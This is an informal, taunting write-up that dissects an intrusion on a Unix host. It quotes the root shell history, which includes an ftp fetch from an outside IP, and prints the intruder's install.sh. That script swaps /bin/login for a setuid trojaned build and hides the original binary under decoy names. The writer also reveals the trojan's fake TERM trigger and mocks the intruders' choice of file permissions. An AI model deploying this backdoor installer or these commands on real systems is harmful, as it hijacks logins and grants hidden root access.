.bash_history mean anything to you guys?
lets have a look:
bash# tail -35 /root/.bash_history | head -5
cd /dev/hda23
ftp 198.93.195.229
chmod +x install.sh
./install.sh
uname -a

nice guys.
lets look at install.sh.
bash# cat install.sh
#!/bin/sh
gcc -o login bj.c
chown root:bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
cp /bin/login /usr/bin/old
chmod 555 /usr/bin/xstat
chgrp bin /usr/bin/xstat
mv login /bin/login
rm bj.c

word. impressing. even wrong permissions on /bin/login.
should have been 4711. timestamping? *sigh*

last and not least since they are using a kiddie trojan. lets have a look at it.

bash# strings /bin/login| tail -5
/usr/bin/xstat
TERM
vt400
vt100
%s=%s
bash#

vt400. nice fake TERM guys.

well I'm out. sleep well, and don't rm -rf. grep is your friend.